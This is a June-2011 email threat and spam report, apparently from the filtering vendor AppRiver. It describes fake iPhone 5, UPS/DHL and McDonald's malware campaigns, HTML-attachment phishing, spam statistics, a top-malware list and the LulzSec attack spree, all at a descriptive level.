July 2011

Threat and Spamscape Report

July 2011

What We Saw in June

Well, it's been a wild ride these past couple of months with quite a few "Anti-Sec" attacks, many of which were focused on well known entities such as the US Senate, CIA affiliates, and big corporations. The attacks were led by a group called, "LulzSec" or "Lulz Security." The six-member team launched attack after attack for 50 days, and as quickly as their LulzBoat appeared it would disappear into the horizon leaving questions and chaos in its wake. Here are a few other notable happenings from the month of June:

• June began with an email campaign touting the new iPhone 5. The only problem was that there is no such thing as the iPhone 5. Instead, the email campaign utilized a Trojan horse designed to attack host PCS.
• Email-delievered virus activity ignited on June 9th when AppRiver filters starter to catch millions of pieces per day. Though it is normal for virus traffic patterns to rise and fall with its associated botnet activity, this wave seems to be remaining strong.
• The McDonald's brand is generally used for an attack about once a year, and they seem to stand out a little differently from most attacks. Perhaps that's due to it being a popular food chain and not the usual tech gadget scam? Regardless, emails began circulating in June claiming to be coupons for free food from McDonald's. Of course the emails were not coupons and were instead tainted with malware. Shut down by AppRiver's own computer health department.
• Html spam, virus, and phishing attacks have become very popular among the cybercriminal community. The attachments are used in an attempt to trick recipients into believing they are on a legitimate webpage and to obfuscate the attackers' true intentions.

Total Email Traffic Volume

This chart represents both total and spam traffic thoughout the month in June. Spam traffic remained level thoughout June.

Tests Failed

This chart represents the number of times messages failed various tests over the past month. Keep in mind that many messages failed multiple tests; hence the total from these charts will surpass the total individiual pieces of spam seen during the month of June.

Regions of Origin

This graph represents both spam and malicious email traffic by region. North America gained two percentage points and claimed a larger portion of the total amount of spam hitting out inbound filters. We also saw the spam originating from Australia and Oceania increase for the second straight month. While Australia and Oceania's total is still less than five percent, their spam output nearly doubled over last month.

Top Ten Countries of Origin

This chart represents the top ten countries from which spam originated during June. The top ten major players in spam output remained the same; however the Republic of Korea jumped two spots to take the number three spot.

Top Email-Delivered Viral Threats

These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top postiion. The virus names that begin with "X." signify rules that were written by AppRiver Analysts. (This does not mean that other anti-virus vendors didn't eventually have definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them).

• X.W32.Sasfis.pak
• X.UPX.App.pakuber
• W32\Mydoom.O
• X.W32.Buzus.pak
• W32\Mydoom.R_worm
• X.W32.Netsky.Q
• W32\Merond.O_worm
• W32\Mydoom.N
• W32\Netsky.C
• X.UPX.App.pakuberb
• X.html.fdphish
• X.win32.worm.
• HTML\Phishing.Gen_trojan
• W32\Mydoom.Q_worm
• W32\Netsky.C_worm
• W32\Fruspam.GD
• W32\Fruspam.CV
• W32\Netsky.Z
• W32\Fruspam.ED

30 Day Virus Activity

This chart represents email-born virus and malware activity during the month of June as seen by AppRiver filters. The month started off slow where email-born virus messages were concerned, but on June 9th the surge surfaced again and has yet to subside. In the past month we have quarentined just shy of 50 million email-born viruses.

Image Spam

The chart below represents total Image spam seen by AppRiver filters during June. The obfuscation tactic of using image attachments in an attempt to deliver spam content tapered off this month falling six percent from last month.

Premature News of an iPhone 5 Release

Timed perfectly with everyone's World Wide Developers Conference, malware authors decided to jump on the bandwagon and sent out tons of malicious emails claiming to be from Apple. Messages were addressed from noreply@apple.com with subject line, "Finally. The amazing iPhone 5. Now available in black edition." The email shown below touts the new device as being slimmer, faster and sleeker. What it doesn't tell you is that the iPhone 5 does not exist.

The ad, of course, is riddled with links pointing to an exploited web page that hosted a file named iphone5.gif.exe. The file was meant to infect PCs in order to create a backdoor to victims' machines. I'm afraid that anyone who is looking forward to getting a new iPhone 5G will have to wait until late 2012. Until then, we here at AppRiver will on to these fakes.

Back to the Grind

On June 9th we went from seeing around 200K virus messages per day to seeing approximately 250k per hour, and there is no sign of withdrawal in sight. It all (re)began with a malware campaign pretending to be from UPS. Not a big surprise there since this tried and apparently true delivery disguise has been going on for several years. When timed well, I can see how recipients expecting packages from UPS might fall victim to the scam.

The file was named UPS_Document.zip, from a campaign we identified as being a variant of the Kryptik family of Trojans. The files were designed to be the stealth and muscle to break open new backdoors into infected PCs. The new backdoor would then be used to download and install a variety of other malware such as banking Trojans and keyloggers. The campaign came on the heels of another smaller, less successful campaign from the same authors from the weekend prior. That smaller campaign pretended to come from another delivery service - DHL. But it contained errors which is probably why we didn't see many of them. These files named DHL mail.zip were included in the raw message headers however; they were inaccessible to most email clients. This allowed a malicious signature to remain intact but rendered the emails essentially harmless. Some of them like the one pictured above did in fact include an accessible attachment which made them much more dangerous. Happily for AppRiver clients we were blocking them out of the gate.

Food, Folks, and Malware

Just a week ago we began seeing something in our traps that may have been rather tempting to hungry, groggy email recipients. A malware campaign purporting to come from "Celebration at McDonald's" was offering free McDonald's food to all of its addresses. The attachment labeled Invitation_Card_ 15584.zip was supposed to be a coupon for said free food, but instead it contained a malicious Trojan. The email tempted victims by claiming McDonald's was having a "free supper day" on June 29th with a free menu consisting of a Double-Cheeseburger, World Famous Fries, a salad, McFlurry, and a McCafe Cappuccino. Subject lines included "Tasty and free food for each"; "We have brand new dishes to give to you for free"; "We invite you to the day of free food," and "Free helpings of your favorite dishes," among several other.

Phishing Attacks Evolve to Avoid Detection by Browsers

For quite a while now we have been seeing a steady increase in the use of HTML attachments to deliver malicious content. Typically, a phisher will set up a fake login screen on a Web page and then send spam emails with links to the site to as many people as possible in an attempt to lure them to hand over their information. In this example, the "phisher" has delivered the web page (HTML attachment) to victims so that it can be viewed locally. This method of attaching the HTML file has become very popular over the past year or so as browsers such as Mozilla Firefox, IE and Chrome have become better at detecting phishing. By attaching the HTML file the phishers can successfully avoid being detected by the anti-phishing protection that is built into the browser.

Once the user is fooled into opening and completing the form in the HTML attachment the information is typically sent via a POST request to a PHP script hosted on the bad guys' webserver or often someone else's hacked webserver. All of the individual's personal information is collected through the POST request to the webserver and the PHP script will serve as a redirect, taking the person to the actual website of whichever company was just phished. By landing the individual at the real website the phisher is attempting to avoid suspicion of any wrongdoing in the transaction. Fortunately for those of us with spam and virus filtering for our email, these attachments are fairly easy to detect.

Was it Worth the Lulz?

For a period of 50 days beginning in the month of May, a group of six individuals calling themselves LulzSec began attacking public facing webservers and pivoting through them exposing critical company data. LulzSec first came on the scene by exposing the names, phone numbers, DoBs, emails, and passwords for everyone who had applied to be a contestant on the popular British talent show X Factor. This was followed with Fox.com and its affiliates passwords and log-in information three days later. From there, they went on to expose information for PBS.org, several online gaming sites, the US Senate, a couple of FBI affiliate sites, and a long hateful attack against everything Sony. All the while these individuals maintained a very active Twitter feed announcing everything they did and even set up a phone number which they actually answered at times to take requests. The group claimed that they were just doing it "for the Lulz". Their stated goal was to prove that security in essence didn't exist in the manner it needed to on most networks, and they were going to continue proving their point.

A lot of the people on the Internet began following LulzSec and even siding with them as if they were a sort of Robin Hood of the Internet by pointing out big corporations and big government didn't take care of sensitive information to the degree that they should. The only thing is that they exposed private information of hundreds of thousands of otherwise innocent people who had nothing to do with their "cause". It is one thing to point out flaws in security when done in a proper ethical manner, this is another.